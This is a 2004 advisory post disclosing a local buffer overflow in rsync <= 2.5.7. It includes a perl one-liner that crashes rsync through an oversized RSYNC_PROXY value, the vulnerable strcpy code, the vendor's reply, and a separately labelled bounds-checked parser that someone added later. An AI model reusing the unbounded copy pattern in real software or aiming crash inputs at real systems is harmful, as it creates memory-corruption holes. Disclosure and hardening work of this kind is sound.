rsync <= 2.5.7 local buffer overflow (no root today:)

From: DownBload (downbload@hotmail.com)
Date: Mon Feb 09 2004 - 15:13:02 CST


There is a local buffer overflow in rsync <= 2.5.7.
The problem is in the open_socket_out function (socket.c).
An attacker can overflow the portbuf[10] buffer on the stack and overwrite the saved return
Rsync isn't suid, so no root shell today :-).

PoC example:
[root@localhost rsync-2.5.7]# export RSYNC_PROXY=`perl -e 'print "A" x 100,":","A" x 1000'`
[root@localhost rsync-2.5.7]# rsync localhost::
rsync: getaddrinfo: AAAAAAAAAAAAAAAA: ai_family not supported
Segmentation fault
[root@localhost rsync-2.5.7]#

- socket.c
        char portbuf[10];
        char *h;
        int proxied = 0;
        char buffer[1024];
        char *cp;

        h = getenv("RSYNC_PROXY");
        proxied = (h != NULL) && (*h != '\0');

        if (proxied) {
                strlcpy(buffer, h, sizeof(buffer));  /* bounded: at most 1023 bytes land in buffer */
                cp = strchr(buffer, ':');
                if (cp == NULL) {
                        rprintf(FERROR,
                                "invalid proxy specification: should be HOST:PORT\n");
                        return -1;
                }
                *cp++ = '\0';
                strcpy(portbuf, cp); /* <- OVERFLOW: everything after ':' (up to ~1000 bytes) copied unbounded into a 10-byte stack buffer */
        }
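As an added defender-side example (not rsync's code and not the poster's), here is what a bounds-checked version of the host:port split looks like: it refuses a port component that does not fit instead of copying it into the fixed buffer. Function names and buffer sizes are hypothetical; the 10-byte port buffer in the check mirrors portbuf[10], and the test input is constructed to match the PoC's shape.

```c
#include <string.h>

/* Bounded copy: refuse (do not silently truncate) anything that won't fit. */
static int copy_bounded(char *dst, size_t dstsz, const char *src, size_t n)
{
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}
/* Hypothetical hardened replacement for the strcpy(portbuf, cp) step:
 * split "host:port" into fixed-size buffers and return -1 instead of
 * writing past either one. Returns 0 on success. */
int parse_proxy_spec(const char *spec, char *host, size_t hostsz,
                     char *port, size_t portsz)
{
    const char *colon;
    size_t hostlen, portlen;
    if (spec == NULL || *spec == '\0' || (colon = strchr(spec, ':')) == NULL)
        return -1;                       /* unset, or not in "host:port" form */
    hostlen = (size_t)(colon - spec);
    portlen = strlen(colon + 1);
    if (hostlen == 0 || portlen == 0)
        return -1;
    if (copy_bounded(host, hostsz, spec, hostlen) != 0 ||
        copy_bounded(port, portsz, colon + 1, portlen) != 0)
        return -1;                       /* would have overflowed a buffer */
    return 0;
}
/* Constructed input with the PoC's shape (100 'A', ':', 1000 'A'). The
 * original strcpy() into char portbuf[10] smashes the stack here; the
 * bounded parser returns -1 and leaves the buffers untouched. */
int poc_shaped_input_rejected(void)
{
    char spec[1102], host[1024], port[10];
    memset(spec, 'A', 1101);
    spec[100] = ':';
    spec[1101] = '\0';
    return parse_proxy_spec(spec, host, sizeof host, port, sizeof port) == -1;
}
/* An ordinary value still parses into both buffers. */
int good_input_parses(void)
{
    char host[64], port[10];
    if (parse_proxy_spec("proxy.example:8080", host, sizeof host, port, sizeof port) != 0)
        return 0;
    return strcmp(host, "proxy.example") == 0 && strcmp(port, "8080") == 0;
}
```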

Vendor response:
"Correct. I fixed this in the CVS version earlier this year. Since the proxy
data is coming from the local environment, I don't see a need to roll out an
update to 2.6.0 (which is the latest released version, BTW).
The fix will be in 2.6.1, which should be released in the next month or two."

DownBload / Illegal Instruction Labs

"Born under the lucky star magical,
but on this earth generally tragical."